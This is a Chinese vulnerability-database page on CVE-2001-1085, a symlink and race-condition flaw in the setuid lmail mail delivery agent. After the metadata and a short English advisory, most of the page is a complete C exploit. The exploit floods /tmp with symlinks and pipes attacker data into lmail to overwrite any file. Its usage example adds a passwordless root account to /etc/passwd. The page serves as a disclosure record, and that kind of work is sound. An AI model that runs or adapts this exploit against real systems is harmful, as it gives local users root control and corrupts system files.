Lmail文件威胁

Lmail文件威胁

漏洞ID 1106421 漏洞类型 未知
发布时间 2001-07-04 更新时间 2005-05-02
图片[1]-Lmail文件威胁-安全小百科CVE编号 CVE-2001-1085
图片[2]-Lmail文件威胁-安全小百科CNNVD-ID CNNVD-200107-055
漏洞平台 Linux CVSS评分 3.7
|漏洞来源
https://www.exploit-db.com/exploits/20992
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-055
|漏洞详情
Lmail2.7及其早期版本存在漏洞。本地用户可以借助临时文件上的链接攻击覆盖任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/2984/info

Jon Zeeff's lmail is a local mail delivery agent (LDA) designed to provide mail-to-pipe and mail-to-file aliasing for smail.

A race condition vulnerability exists in lmail. The lmail program makes insecure use of temporary files, making it susceptible to symbolic link attacks. The program also writes data from the standard input stream (stdin) directly to the temporary file.

Because lmail is usually installed setuid root, it may be possible for a local user to overwrite any file on a system with arbitrary data. 

/* lmail-xpl.c
 *
 * Quick hack to exploit lmail
 *
 * Simply run it with the file you want to create/overwrite
 * and the data you wish to place in the file.
 *
 * Example:
 *
 * $ gcc -g -Wall lmail-xpl.c -o lmail-xpl
 * $ ./lmail-xpl /etc/passwd owned::0:0::/root:/bin/bash
 *
 * Then login as owned... etc..
 *
 * by Charles Stevenson <[email protected]>
 *
 * July 04 2001
 *
 * shoutz b10z
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define TEMPFILE "/tmp/ez.XXXXXX"
#define BRUTE 128

void usage(char*);

int main(int argc, char **argv){
   char tempfile[128] = TEMPFILE;
   int fd, i;
   pid_t pid;
   char temp[512];
   
   if (argc < 3){
      usage(argv[0]);
   }

   if((fd = mkstemp(tempfile))==-1){
      fprintf(stderr, "Error creating %s!n",tempfile);
      exit(1);
   }

   /* begin lazy slacker coding */
   fprintf(stderr, "lmail-xpl.c by core (c) 2001n");
   fprintf(stderr, "> backing up %s to %sn", argv[1], tempfile);

   /* backup old file */
   sprintf(temp, "/bin/cp %s %s", argv[1], tempfile);
   system(temp);
   
   /* set the date/time */
   sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
   system(temp);

   pid = getpid();

   fprintf(stderr, "> creating a lot of symlinksn");

   for (i=0;i<BRUTE;i++){
      sprintf(temp, "/tmp/lmail%d", pid+i);
      symlink(argv[1], temp);
   }

   sprintf(temp, "/bin/echo `perl -e 'print "\n"'`%s | lmail -fn", argv[2]);
   fprintf(stderr, "Running a few times since I'm lazy.n");
   for (i=0;i<BRUTE;i++){
      system(temp);
      //sleep(1);
   }

   sprintf(temp, "/bin/ls -l %s", argv[1]);
   system(temp);

   fprintf(stderr, "> cleaning upn");
   sprintf(temp, "/bin/rm -f /tmp/lmail*; /bin/rm -f /tmp/ez.*");
   system(temp);
   
   fprintf(stderr, "All done. Enjoy!n");
   return 0;
}

void usage(char *name){
   
   fprintf(stderr, "usage: %s <filename> <data>n", name);
   exit(1);
}
|参考资料

来源:BUGTRAQ
名称:20010705lmaillocalrootexploit
链接:http://www.securityfocus.com/archive/1/195022
来源:XF
名称:lmail-tmpfile-symlink(6809)
链接:http://xforce.iss.net/static/6809.php
来源:BID
名称:2984
链接:http://www.securityfocus.com/bid/2984

相关推荐: Linux in.telnetd Denial of Service Vulnerability

Linux in.telnetd Denial of Service Vulnerability 漏洞ID 1104684 漏洞类型 Input Validation Error 发布时间 1999-08-19 更新时间 1999-08-19 CVE编号 N/…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享